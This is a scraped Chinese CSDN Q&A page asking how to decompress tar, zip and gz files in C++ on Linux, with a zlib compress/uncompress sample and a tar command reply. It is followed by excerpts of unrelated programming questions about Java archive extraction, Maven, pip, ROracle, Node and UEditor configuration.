c++怎么解压文件 tar.zip gz格式等

c++怎么解压文件 tar.zip gz格式等 ( linux ) 能举个小例子吗 (zlib库?)

3个回答

 #include <string>
#include <time.h>
#include <stdio.h>
#include <iostream>
#include <string.h>
#include "zlib.h"
int main()
{
    unsigned long int fileLength;
    unsigned long int readLength;
    unsigned long int compressBufLength;
    unsigned long int uncompressLength;
    unsigned long int offset;

    unsigned char *readBuf = new unsigned char[512];//the readbuf of the exist file content
    unsigned char *compressBuf = new unsigned char[512];//the compress buffer   
    unsigned char *uncompressBuf = new unsigned char[512];//the uncompress  content buffer
    FILE *originalFile = fopen("/lgw150/temp/src/lg4/original.lg4","a+");//the exist file
    FILE *compressedFile = fopen("/lgw150/temp/src/lg4/compressed.lg4","a+");//compressfile
    FILE *uncompressFile = fopen("/lgw150/temp/src/lg4/uncompressed.lg4","a+");//

    fseek(originalFile,0,2);
    fileLength = ftell(originalFile);
    offset = 0;//
       while(offset <fileLength)//
    {


        printf("offset=%lu;fileLength=%lu\n",offset,fileLength);
        memset(readBuf,0,512);
        memset(compressBuf,0,512);
        memset(uncompressBuf,0,512);
        fseek(originalFile,offset,0);//
        readLength = fread(readBuf,sizeof(char),512,originalFile);
        offset += readLength;//
        int compressValue = compress(compressBuf,&compressBufLength,readBuf,readLength);
        int fwriteValue = fwrite(compressBuf,sizeof(char),compressBufLength,compressedFile);//
        printf("compressValue = %d;fwriteLength = %d;compressBufLength=%lu;readLength = %lu\n",compressValue,fwriteValue,compressBufLength,readLength);

        int uncompressValue = uncompress(uncompressBuf,&uncompressLength,compressBuf,compressBufLength);//
        int fwriteValue2= fwrite(uncompressBuf,sizeof(char),uncompressLength,uncompressFile);//
    }
    fseek(originalFile,0,0);
    fseek(compressedFile,0,0);
    fseek(uncompressFile,0,0);
    if(originalFile != NULL)
    {
        fclose(originalFile);
        originalFile = NULL;
    }

   if(compressedFile != NULL)
    {
        fclose(compressedFile);
        compressedFile = NULL;
    }
     if(uncompressFile != NULL)
    {
        fclose(uncompressFile);
        uncompressFile = NULL;
    }

    delete[] readBuf;
    delete[] compressBuf;
    delete[] uncompressBuf;
return 0;


}
lp_opai
lp_opai 没有直接解压的吗
大约 3 年之前 回复
lp_opai
lp_opai 确定可以吗 我一直失败
大约 3 年之前 回复

直接用命令啊,tar xzvf xxx.tar.gz

Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
其他相关推荐
c++怎么解压文件 tar.zip gz格式等
c++怎么解压文件 tar.zip gz格式等 ( linux ) 能举个小例子吗 (zlib库?)
求java解析tar.Z? 另附上java对zip、tar.gz、 tar.bz、 tar的解压。
<div class="iteye-blog-content-contain" style="font-size: 14px;"> <p>       使用java代码解tar.Z文件,程序最终跑在windows上面,不排除以后客户迁移,所以不能使用java调用系统命令的方式解压,只能通过代码来解压。java内部支持解压格式太少,后来使用apache.commons.compress解压了zip、tar.gz、 tar.bz、 tar。但是还是没有找到tar.Z怎么解压,求教高手,帮忙解答。下面是zip、tar.gz、 tar.bz、 tar几种格式的解压。       </p> <p> </p> <pre name="code" class="tar解压">public List&lt;String&gt; list(InputStream inputStream, boolean isCloseStream) throws IOException { List&lt;String&gt; list = new ArrayList&lt;String&gt;(); ArchiveInputStream in = null; try { in = new ArchiveStreamFactory().createArchiveInputStream("tar", new BufferedInputStream(inputStream)); TarArchiveEntry entry = null; while ((entry = (TarArchiveEntry) in.getNextEntry()) != null) { list.addAll(FileFach.parserEveryFile(entry.getName().replaceAll("\\\\", "/"), in)); } } catch (ArchiveException e) { throw new ExtractorException(ErrorType.UNSUPPORTED_FILE_TYPE, e); } finally { if (isCloseStream) { IOUtils.closeQuietly(in); IOUtils.closeQuietly(inputStream); } } return list; }</pre> <p> </p> <pre name="code" class="tar.gz 解压">public List&lt;String&gt; list(InputStream inputStream, boolean isCloseStream) throws IOException { List&lt;String&gt; list = new ArrayList&lt;String&gt;(); ArchiveInputStream in = null; GZIPInputStream gis = null; try { gis = new GZIPInputStream(new BufferedInputStream(inputStream)); in = new ArchiveStreamFactory().createArchiveInputStream("tar", gis); TarArchiveEntry entry = null; while ((entry = (TarArchiveEntry) in.getNextEntry()) != null) { list.addAll(FileFach.parserEveryFile(entry.getName().replaceAll("\\\\", "/"), in)); } entry = null; } catch (ArchiveException e) { throw new ExtractorException(ErrorType.UNSUPPORTED_FILE_TYPE, e); } finally { if (isCloseStream) { IOUtils.closeQuietly(gis); IOUtils.closeQuietly(inputStream); IOUtils.closeQuietly(in); } } return list; }</pre> <p> </p> <pre name="code" class="tar.bz 解压">public List&lt;String&gt; list(InputStream inputStream, boolean isCloseStream) throws IOException { List&lt;String&gt; list = new ArrayList&lt;String&gt;(); ArchiveInputStream in = null; try { in = new ArchiveStreamFactory().createArchiveInputStream("tar", new BZip2CompressorInputStream(inputStream)); TarArchiveEntry entry = null; while ((entry = (TarArchiveEntry) in.getNextEntry()) != null) { list.addAll(FileFach.parserEveryFile(entry.getName().replaceAll("\\\\", "/"), in)); } } catch (ArchiveException e) { throw new ExtractorException(ErrorType.UNSUPPORTED_FILE_TYPE, e); } finally { if (isCloseStream) { IOUtils.closeQuietly(in); IOUtils.closeQuietly(inputStream); } } return list; }</pre> <p> </p> <pre name="code" class="zip 解压">public List&lt;String&gt; list(InputStream inputStream, boolean isCloseStream) throws IOException { List&lt;String&gt; list = new ArrayList&lt;String&gt;(); ArchiveInputStream in = null; try { in = new ArchiveStreamFactory().createArchiveInputStream("zip", new BufferedInputStream(inputStream)); ZipArchiveEntry entry = null; while ((entry = (ZipArchiveEntry) in.getNextEntry()) != null) { list.addAll(FileFach.parserEveryFile(entry.getName().replaceAll("\\\\", "/"), in)); } } catch (ArchiveException e) { throw new ExtractorException(ErrorType.UNSUPPORTED_FILE_TYPE, e); } finally { if (isCloseStream) { IOUtils.closeQuietly(inputStream); IOUtils.closeQuietly(in); } } return list; }</pre> <p> </p> </div>
web小白请教,如何利用js url 下载 .tar.gz 或 .zip 等压缩文件?
例如我服务器根目录为/var/www/,如何点击按钮触发一个事件去下载该目录的test.tar.gz 与test.zip文件,用js实现,各位有经验的前辈有比较好的方法吗? 最好是有比较详细的代码,谢谢啦! 我之前在网上找资料已经实现 .txt 类型文件下载,利用http://danml.com/js/download2.js可以实现,现在想实现压缩文件下载,不止该如何入手。
apache 下载jar包 文件后缀名的含义
当我在Apache上下载一些jar包的时候,会出现要要下载jar包还是下载源代码这两类,但是在每一类中又有两个文件,一个是以tar.gz为后缀,一个是以zip为后缀,例如: Commons BeanUtils 1.8.3 Binaries commons-beanutils-1.8.3-bin.tar.gz md5 pgp commons-beanutils-1.8.3-bin.zip md5 pgp Source commons-beanutils-1.8.3-src.tar.gz md5 pgp commons-beanutils-1.8.3-src.zip 我想问下,后缀不同的两个文件之间有什么区别,他们各自的含义是什么?
蝶变(debian)8 Xfce桌面环境 下 怎么 配置系统?
第一步应该是更新 源 怎么更新呢? su root //先将 账户权限切换为超级管理员(Root) 密码 //此处直接输入密码,不会显示密码的。输完后“回车”下。 。。。。 然后呢? ----------------------------------------------------------------------------------- 1、中文输入法(中州韵)Fcitx框架,去GitHub那下载“fcitx-rime-master.zip” 弹出的提示窗口是说“Ark”打开,这个“Ark”是解压软件吧?那么解压到哪里好呢? 2、无线网络 WiFi用不了了,这估计是驱动没有装,怎么装驱动呢?先把源给更新了。 3、VirtuaIBox虚拟机启动虚拟系统Windows 7 报错 “ 不能为虚拟电脑 JiaGuWen 打开一个新任务. The virtual machine 'JiaGuWen' has terminated unexpectedly during startup with exit code 1 (0x1). 返回 代码:NS_ERROR_FAILURE (0x80004005) 组件:Machine 界面:IMachine {480cf695-2d8d-4256-9c7c-cce4184fa048} ” 请问这是怎么回事? 4、安桌开发 去eclipse官方网站下载 “eclipse-jee-luna-SR2-linux-gtk-x86_64.tar.gz”, 请问怎么安装“eclipse”,不会装“点tar点gz”, 好像是要把压缩包解压出来,等等。。。解压到哪里? 5、Java 去甲骨文中文官方网站下载 “jdk-8u20-linux-x64.tar.gz” 同上 。tar。gz格式的文件,是不是都是要把解压出来的不同文件放到对应的文件内去, 那么规则是什么? 6、有的。tar。gz文件,解压出来就可以直接用的了,想火狐浏览器那样, 所以,在纠结解压后放到哪里呢? 7、更新源,好像不会更新源,新立得软件管理器,挺好用的, 就是有不知道那些源列表(debian 8 的) 找到源网址后,填上网址后,后面的 “/×××× ”,这些怎么写? ![图片说明](https://img-ask.csdn.net/upload/201505/23/1432373689_586289.png)
用maven package打包项目时,一直卡在 Reading assembly descriptor 无响应
# 一丶问题描述 使用的是自定义打包**maven-assembly-plugin** 以下为组件的pom.xml ``` <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-assembly-plugin</artifactId> <version>3.1.0</version> <configuration> <finalName>${project.artifactId}</finalName> <recompressZippedFiles>false</recompressZippedFiles> <appendAssemblyId>true</appendAssemblyId> <descriptors> <descriptor>package.xml</descriptor> </descriptors> <!-- 打包结果输出的基础目录 --> <outputDirectory>${project.build.directory}/</outputDirectory> </configuration> <executions> <execution> <id>make-assembly</id> <phase>package</phase> <goals> <goal>single</goal> </goals> </execution> </executions> </plugin> ``` 以下为maven-assembly-plugin调用的 **package.xml** ``` <assembly xmlns="http://maven.apache.org/ASSEMBLY/2.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/ASSEMBLY/2.0.0 http://maven.apache.org/xsd/assembly-2.0.0.xsd"> <id>release</id> <!-- 设置打包格式,可同时设置多种格式,常用格式有:dir、zip、tar、tar.gz dir 格式便于在本地测试打包结果 zip 格式便于 windows 系统下解压运行 tar、tar.gz 格式便于 linux 系统下解压运行 --> <formats> <format>dir</format> <!-- <format>zip</format>--> <format>tar.gz</format> </formats> <!-- 打 zip 设置为 true 会在包在存在总目录,打 dir 时设置为 false 少层目录 --> <includeBaseDirectory>true</includeBaseDirectory> <fileSets> <!-- src/main/resources 全部 copy 到 config 目录下 --> <fileSet> <directory>${basedir}/src/main/resources</directory> <outputDirectory>config</outputDirectory> </fileSet> <!-- src/main/webapp 全部 copy 到 webapp 目录下 --> <fileSet> <directory>${basedir}/src/main/webapp</directory> <outputDirectory>webapp</outputDirectory> </fileSet> <!-- 项目根下面的脚本文件 copy 到根目录下 --> <fileSet> <directory>${basedir}</directory> <outputDirectory>./</outputDirectory> <!-- 脚本文件在 linux 下的权限设为 755,无需 chmod 可直接运行 --> <fileMode>755</fileMode> <includes> <include>*.sh</include> <include>*.bat</include> </includes> </fileSet> </fileSets> <!-- 依赖的 jar 包 copy 到 lib 目录下 --> <dependencySets> <dependencySet> <outputDirectory>lib</outputDirectory> </dependencySet> </dependencySets> </assembly> ``` ## 结果: ![图片说明](https://img-ask.csdn.net/upload/201909/09/1567959005_109252.png) 一直卡在这个reading不动 项目文件大小: ![图片说明](https://img-ask.csdn.net/upload/201909/09/1567959066_267312.png) # 二丶个人的猜测 尝试package.xml顶部的网址浏览器打不开,而且 代码是标红的,可是问题在于别的示范xml的顶部网页也都是打不开的 ![图片说明](https://img-ask.csdn.net/upload/201909/09/1567959152_638069.png) 请大佬求助!!!
安装newspaper出问题,怎么解决?
Collecting newspaper Using cached newspaper-0.0.9.8.tar.gz Collecting beautifulsoup4==4.3.2 (from newspaper) Using cached beautifulsoup4-4.3.2.tar.gz Collecting Pillow==2.5.1 (from newspaper) Using cached Pillow-2.5.1.zip Collecting PyYAML==3.11 (from newspaper) Using cached PyYAML-3.11.zip Collecting cssselect==0.9.1 (from newspaper) Using cached cssselect-0.9.1.tar.gz Collecting lxml==3.3.5 (from newspaper) Using cached lxml-3.3.5.tar.gz Collecting nltk==2.0.5 (from newspaper) Using cached nltk-2.0.5.tar.gz Complete output from command python setup.py egg_info: Downloading http://pypi.python.org/packages/source/d/distribute/distribute-0.6.21.tar.gz Extracting in /tmp/tmpXRU3_3 Now working in /tmp/tmpXRU3_3/distribute-0.6.21 Building a Distribute egg in /tmp/pip-build-FTHmMn/nltk Traceback (most recent call last): File "setup.py", line 37, in <module> exec(open(init_path).read(), d) File "<string>", line 8, in <module> File "/tmp/tmpXRU3_3/distribute-0.6.21/setuptools/__init__.py", line 2, in <module> from setuptools.extension import Extension, Library File "/tmp/tmpXRU3_3/distribute-0.6.21/setuptools/extension.py", line 2, in <module> from setuptools.dist import _get_unpatched File "/tmp/tmpXRU3_3/distribute-0.6.21/setuptools/dist.py", line 6, in <module> from setuptools.command.install import install File "/tmp/tmpXRU3_3/distribute-0.6.21/setuptools/command/__init__.py", line 8, in <module> from setuptools.command import install_scripts File "/tmp/tmpXRU3_3/distribute-0.6.21/setuptools/command/install_scripts.py", line 3, in <module> from pkg_resources import Distribution, PathMetadata, ensure_directory File "/tmp/tmpXRU3_3/distribute-0.6.21/pkg_resources.py", line 2729, in <module> add_activation_listener(lambda dist: dist.activate()) File "/tmp/tmpXRU3_3/distribute-0.6.21/pkg_resources.py", line 700, in subscribe callback(dist) File "/tmp/tmpXRU3_3/distribute-0.6.21/pkg_resources.py", line 2729, in <lambda> add_activation_listener(lambda dist: dist.activate()) File "/tmp/tmpXRU3_3/distribute-0.6.21/pkg_resources.py", line 2229, in activate self.insert_on(path) File "/tmp/tmpXRU3_3/distribute-0.6.21/pkg_resources.py", line 2330, in insert_on "with distribute. Found one at %s" % str(self.location)) ValueError: A 0.7-series setuptools cannot be installed with distribute. Found one at /usr/lib/python2.7/dist-packages /tmp/pip-build-FTHmMn/nltk/distribute-0.6.21-py2.7.egg Traceback (most recent call last): File "<string>", line 1, in <module> File "/tmp/pip-build-FTHmMn/nltk/setup.py", line 23, in <module> distribute_setup.use_setuptools() File "distribute_setup.py", line 145, in use_setuptools return _do_download(version, download_base, to_dir, download_delay) File "distribute_setup.py", line 125, in _do_download _build_egg(egg, tarball, to_dir) File "distribute_setup.py", line 116, in _build_egg raise IOError('Could not build the egg.') IOError: Could not build the egg. ---------------------------------------- Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-FTHmMn/nltk/
ROracle安装的时候遇见的问题,求大神们帮帮忙啊!!!!!
--- 在此連線階段时请选用CRAN的鏡子 --- also installing the dependency ‘DBI’ Package which is only available in source form, and may need compilation of C/C++/Fortran: ‘ROracle’ 你想从源代码尝试安装这些 y/n: y 试开URL’https://mirrors.tuna.tsinghua.edu.cn/CRAN/bin/windows/contrib/3.2/DBI_0.3.1.zip' Content type 'application/zip' length 162901 bytes (159 KB) downloaded 159 KB 程序包‘DBI’打开成功,MD5和检查也通过 下载的二进制程序包在 C:\Documents and Settings\Administrator\Local Settings\Temp\RtmpA35ab3\downloaded_packages里 installing the source package ‘ROracle’ 试开URL’https://mirrors.tuna.tsinghua.edu.cn/CRAN/src/contrib/ROracle_1.2-1.tar.gz' Content type 'application/octet-stream' length 299072 bytes (292 KB) downloaded 292 KB * installing *source* package 'ROracle' ... ** 成功将'ROracle'程序包解包并MD5和检查 ERROR: cannot find Oracle Client. Please set OCI_LIB32 to specify its location. Warning: 运行命令'sh ./configure.win'的状态是1 ERROR: configuration failed for package 'ROracle' * removing 'C:/R-3.2.2/library/ROracle' 下载的程序包在 ‘C:\Documents and Settings\Administrator\Local Settings\Temp\RtmpA35ab3\downloaded_packages’里 Warning messages: 1: 运行命令'"C:/R-3.2.2/bin/i386/R" CMD INSTALL -l "C:\R-3.2.2\library" C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RtmpA35ab3/downloaded_packages/ROracle_1.2-1.tar.gz'的状态是1 2: In install.packages(NULL, .libPaths()[1L], dependencies = NA, type = type) : 安装程序包‘ROracle’时退出狀態的值不是0 上面是界面里面显示的东西,上面流程走完之后还是LIBRARY还是无法找到包,求大婶帮帮忙啊!!!!!
不知道有没有大神研究openmeetings,使用的是3.0.3版本,使用ant+ivy构建依赖和项目的
ant运行build.xml过程中老出错 <untar src="${red5.server.dir}/target/red5-server-${red5.server.version}-server.tar.gz" dest="${red5.server.dir}/target" compression="gzip"/> 这句报错,好像是不能压缩到那个路径下 附上部分打印信息: [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - --- maven-install-plugin:2.4:install (default-install) @ red5-server --- [artifact:mvn] [main] INFO org.apache.maven.DefaultMaven - Installing F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\target\red5-server-1.0.3-RELEASE.jar to C:\Users\ZhangV\.m2\repository\org\red5\red5-server\1.0.3-RELEASE\red5-server-1.0.3-RELEASE.jar [artifact:mvn] [main] INFO org.apache.maven.DefaultMaven - Installing F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\pom.xml to C:\Users\ZhangV\.m2\repository\org\red5\red5-server\1.0.3-RELEASE\red5-server-1.0.3-RELEASE.pom [artifact:mvn] [main] INFO org.apache.maven.DefaultMaven - Installing F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\target\red5-server-1.0.3-RELEASE-sources.jar to C:\Users\ZhangV\.m2\repository\org\red5\red5-server\1.0.3-RELEASE\red5-server-1.0.3-RELEASE-sources.jar [artifact:mvn] [main] INFO org.apache.maven.DefaultMaven - Installing F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\target\red5-server-1.0.3-RELEASE-server.tar.gz to C:\Users\ZhangV\.m2\repository\org\red5\red5-server\1.0.3-RELEASE\red5-server-1.0.3-RELEASE-server.tar.gz [artifact:mvn] [main] INFO org.apache.maven.DefaultMaven - Installing F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\target\red5-server-1.0.3-RELEASE-server.zip to C:\Users\ZhangV\.m2\repository\org\red5\red5-server\1.0.3-RELEASE\red5-server-1.0.3-RELEASE-server.zip [artifact:mvn] [main] INFO org.apache.maven.DefaultMaven - Installing F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\target\red5-server-1.0.3-RELEASE-javadoc.jar to C:\Users\ZhangV\.m2\repository\org\red5\red5-server\1.0.3-RELEASE\red5-server-1.0.3-RELEASE-javadoc.jar [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - ------------------------------------------------------------------------ [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - BUILD SUCCESS [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - ------ ------------------------------------------------------------------ [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - Total time: 02:54 min [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - Finished at: 2014-09-30T11:24:54+08:00 [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - Final Memory: 20M/97M [artifact:mvn] [main] INFO org.apache.maven.cli.event.ExecutionEventLogger - ------------------------------------------------------------------------ [untar] Expanding: F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\target\red5-server-1.0.3-RELEASE-server.tar.gz into F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\target BUILD FAILED F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build.xml:1185: Error while expanding F:\J2EEMyEclipse\apache-openmeetings-3.0.3-src\build\red5\server\target\red5-server-1.0.3-RELEASE-server.tar.gz java.io.IOException: Error detected parsing the header Total time: 5 minutes 41 seconds
node项目运行后提示错误信息ERR_HTTP_INVALID_HEADER_VALUE
我在运行node项目时提示运行错误 ``` D:\hichat>node app.js server on *:3000 _http_outgoing.js:475 throw new ERR_HTTP_INVALID_HEADER_VALUE(value, name); ^ TypeError [ERR_HTTP_INVALID_HEADER_VALUE]: Invalid value "undefined" for header "Content-Type" at storeHeader (_http_outgoing.js:432:5) at processHeader (_http_outgoing.js:427:3) at ServerResponse._storeHeader (_http_outgoing.js:332:11) at ServerResponse.writeHead (_http_server.js:303:8) at D:\hichat\modules\StaticService.js:30:8 at FSReqCallback.readFileAfterClose [as oncomplete] (internal/fs/read_file_context.js:61:3) { code: 'ERR_HTTP_INVALID_HEADER_VALUE' } ``` 网上找了很多,都没有找到相应的方法和出现的原因 ``` StaticService.js var fs = require("fs"),//内部模块 处理文件操作 path =require("path"),//内部模块 处理路径操作 mime =require("./mime").types;//自定义模块请求处理文档类型操作 /** * 404 NOT FOUNT 函数 * @param {[type]} res [请求对象] */ function send404(res){ res.writeHead(404,{"Content-Type":"text/plain"}); res.end("404 not found"); } /** * 静态文件请求函数 * @param {[type]} realpath [绝对路径] * @param {[type]} res [服务器请求对象] */ function staticServer(realpath,res){ fs.readFile(realpath,function(err,data){ if(!err){ var extname=path.extname(realpath); res.writeHead(200,{"Content-Type":mime[extname]}); //这行报错 res.end(data); }else{ send404(res); } }); } /** * 静态服务器主入口模块 * @param {[type]} pathname [请求路径名称] * @param {[type]} res [请求对象] * @param {[type]} base_dir [根目录] */ exports.staticRender=function(pathname,res,base_dir){ var reg = /^\/static|upload/;//目录匹配 if(reg.test(pathname)){ fs.exists(path.join(base_dir,pathname),function(exists){ if(exists){ staticServer(path.join(base_dir,pathname),res) }else{ send404(res); } }) }else{ send404(res); } } ``` ``` /** * title hichat聊天室 文件mime类型对象 */ exports.types = { '.hqx':'application/mac-binhex40', '.cpt':'application/mac-compactpro', '.csv':['text/x-comma-separated-values', 'text/comma-separated-values', 'application/octet-stream', 'application/vnd.ms-excel', 'application/x-csv', 'text/x-csv', 'text/csv', 'application/csv', 'application/excel', 'application/vnd.msexcel'], '.bin':'application/macbinary', '.dms':'application/octet-stream', '.lha':'application/octet-stream', '.lzh':'application/octet-stream', '.exe':['application/octet-stream', 'application/x-msdownload'], '.class':'application/octet-stream', '.psd':'application/x-photoshop', '.so':'application/octet-stream', '.sea':'application/octet-stream', '.dll':'application/octet-stream', '.oda':'application/oda', '.pdf':['application/pdf', 'application/x-download'], '.ai':'application/postscript', '.eps':'application/postscript', '.ps':'application/postscript', '.smi':'application/smil', '.smil':'application/smil', '.mif':'application/vnd.mif', '.xls':['application/excel', 'application/vnd.ms-excel', 'application/msexcel'], '.ppt':['application/powerpoint', 'application/vnd.ms-powerpoint'], '.wbxml':'application/wbxml', '.wmlc':'application/wmlc', '.dcr':'application/x-director', '.dir':'application/x-director', '.dxr':'application/x-director', '.dvi':'application/x-dvi', '.gtar':'application/x-gtar', '.gz':'application/x-gzip', '.php':'application/x-httpd-php', '.php4':'application/x-httpd-php', '.php3':'application/x-httpd-php', '.phtml':'application/x-httpd-php', '.phps':'application/x-httpd-php-source', '.js':'application/x-javascript', '.swf':'application/x-shockwave-flash', '.sit':'application/x-stuffit', '.tar':'application/x-tar', '.tgz':['application/x-tar', 'application/x-gzip-compressed'], '.xhtml':'application/xhtml+xml', '.xht':'application/xhtml+xml', '.zip':['application/x-zip', 'application/zip', 'application/x-zip-compressed'], '.mid':'audio/midi', '.midi':'audio/midi', '.mpga':'audio/mpeg', '.mp2':'audio/mpeg', '.mp3':['audio/mpeg', 'audio/mpg', 'audio/mpeg3', 'audio/mp3'], '.aif':'audio/x-aiff', '.aiff':'audio/x-aiff', '.aifc':'audio/x-aiff', '.ram':'audio/x-pn-realaudio', '.rm':'audio/x-pn-realaudio', '.rpm':'audio/x-pn-realaudio-plugin', '.ra':'audio/x-realaudio', '.rv':'video/vnd.rn-realvideo', '.wav':['audio/x-wav', 'audio/wave', 'audio/wav'], '.bmp':['image/bmp', 'image/x-windows-bmp'], '.gif':'image/gif', '.jpeg':['image/jpeg', 'image/pjpeg'], '.jpg':['image/jpeg', 'image/pjpeg'], '.jpe':['image/jpeg', 'image/pjpeg'], '.png':['image/png', 'image/x-png'], '.tiff':'image/tiff', '.tif':'image/tiff', '.css':'text/css', '.html':'text/html', '.htm':'text/html', '.shtml':'text/html', '.txt':'text/plain', '.text':'text/plain', '.log':['text/plain', 'text/x-log'], '.rtx':'text/richtext', '.rtf':'text/rtf', '.xml':'text/xml', '.xsl':'text/xml', '.mpeg':'video/mpeg', '.mpg':'video/mpeg', '.mpe':'video/mpeg', '.qt':'video/quicktime', '.mov':'video/quicktime', '.avi':'video/x-msvideo', '.movie':'video/x-sgi-movie', '.doc':'application/msword', '.docx':['application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/zip'], '.xlsx':['application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/zip'], '.word':['application/msword', 'application/octet-stream'], '.xl':'application/excel', '.eml':'message/rfc822', '.json':['application/json', 'text/json'] }; ```
百度UEditor 后台配置项返回格式出错,上传功能将不能正常使用!jsp版本
在本地调试正常。上传到服务器后,浏览器控制台报错:后台配置项返回格式出错,上传功能将不能正常使用! ![图片说明](https://img-ask.csdn.net/upload/201705/01/1493628846_280248.png) ![图片说明](https://img-ask.csdn.net/upload/201705/01/1493628902_827771.png) 打开ueditor.all.js 8094行:var config = isJsonp ? r:eval("("+r.responseText+")"); 这句抛出异常。 打印isJsonp为false; 再打印r.responseText; 本地打印出: {"videoMaxSize":102400000,"videoActionName":"uploadvideo","fileActionName":"uploadfile","fileManagerListPath":"/upload/file/","imageCompressBorder":1600,"imageManagerAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp"],"imageManagerListPath":"/upload/image/","fileMaxSize":51200000,"fileManagerAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp",".flv",".swf",".mkv",".avi",".rm",".rmvb",".mpeg",".mpg",".ogg",".ogv",".mov",".wmv",".mp4",".webm",".mp3",".wav",".mid",".rar",".zip",".tar",".gz",".7z",".bz2",".cab",".iso",".doc",".docx",".xls",".xlsx",".ppt",".pptx",".pdf",".txt",".md",".xml"],"fileManagerActionName":"listfile","snapscreenInsertAlign":"none","scrawlActionName":"uploadscrawl","videoFieldName":"upfile","imageCompressEnable":true,"videoUrlPrefix":"/MulinArticle","fileManagerUrlPrefix":"/MulinArticle","catcherAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp"],"imageManagerActionName":"listimage","snapscreenPathFormat":"/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}","scrawlPathFormat":"/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}","scrawlMaxSize":2048000,"imageInsertAlign":"none","catcherPathFormat":"/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}","catcherMaxSize":2048000,"snapscreenUrlPrefix":"/MulinArticle","imagePathFormat":"/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}","imageManagerUrlPrefix":"/MulinArticle","scrawlUrlPrefix":"/MulinArticle","scrawlFieldName":"upfile","imageMaxSize":2048000,"imageAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp"],"snapscreenActionName":"uploadimage","catcherActionName":"catchimage","fileFieldName":"upfile","fileUrlPrefix":"/MulinArticle","imageManagerInsertAlign":"none","catcherLocalDomain":["127.0.0.1","localhost","img.baidu.com"],"filePathFormat":"/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}","videoPathFormat":"/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}","fileManagerListSize":20,"imageActionName":"uploadimage","imageFieldName":"upfile","imageUrlPrefix":"/MulinArticle","scrawlInsertAlign":"none","fileAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp",".flv",".swf",".mkv",".avi",".rm",".rmvb",".mpeg",".mpg",".ogg",".ogv",".mov",".wmv",".mp4",".webm",".mp3",".wav",".mid",".rar",".zip",".tar",".gz",".7z",".bz2",".cab",".iso",".doc",".docx",".xls",".xlsx",".ppt",".pptx",".pdf",".txt",".md",".xml"],"catcherUrlPrefix":"/MulinArticle","imageManagerListSize":20,"catcherFieldName":"source","videoAllowFiles":[".flv",".swf",".mkv",".avi",".rm",".rmvb",".mpeg",".mpg",".ogg",".ogv",".mov",".wmv",".mp4",".webm",".mp3",".wav",".mid"]} 服务器打印出: <%@ page language="java" contentType="text/html; charset=UTF-8" import="com.baidu.ueditor.ActionEnter" pageEncoding="UTF-8"%> <%@ page trimDirectiveWhitespaces="true" %> <% request.setCharacterEncoding( "utf-8" ); response.setHeader("Content-Type" , "text/html"); String rootPath = application.getRealPath( "/" ); out.write( new ActionEnter( request, rootPath ).exec() ); %> 不知为何是这样的结果,有没有大神遇到过类似的问题?
json格式问题
{ "imageActionName": "uploadimage", /* 执行上传图片的action名称 */ "imageFieldName": "upfile", /* 提交的图片表单名称 */ "imageMaxSize": 2048000, /* 上传大小限制,单位B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 上传图片格式显示 */ "imageCompressEnable": true, /* 是否压缩图片,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边限制 */ "imageInsertAlign": "none", /* 插入的图片浮动方式 */ "imageUrlPrefix": "http://127.0.0.1:8080/mrbbs", /* 图片访问路径前缀 */ "imagePathFormat": "/ueditor/jsp/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ /* {filename} 会替换成原文件名,配置这项需要注意中文乱码问题 */ /* {rand:6} 会替换成随机数,后面的数字是随机数的位数 */ /* {time} 会替换成时间戳 */ /* {yyyy} 会替换成四位年份 */ /* {yy} 会替换成两位年份 */ /* {mm} 会替换成两位月份 */ /* {dd} 会替换成两位日期 */ /* {hh} 会替换成两位小时 */ /* {ii} 会替换成两位分钟 */ /* {ss} 会替换成两位秒 */ /* 非法字符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* 涂鸦图片上传配置项 */ "scrawlActionName": "uploadscrawl", /* 执行上传涂鸦的action名称 */ "scrawlFieldName": "upfile", /* 提交的图片表单名称 */ "scrawlPathFormat": 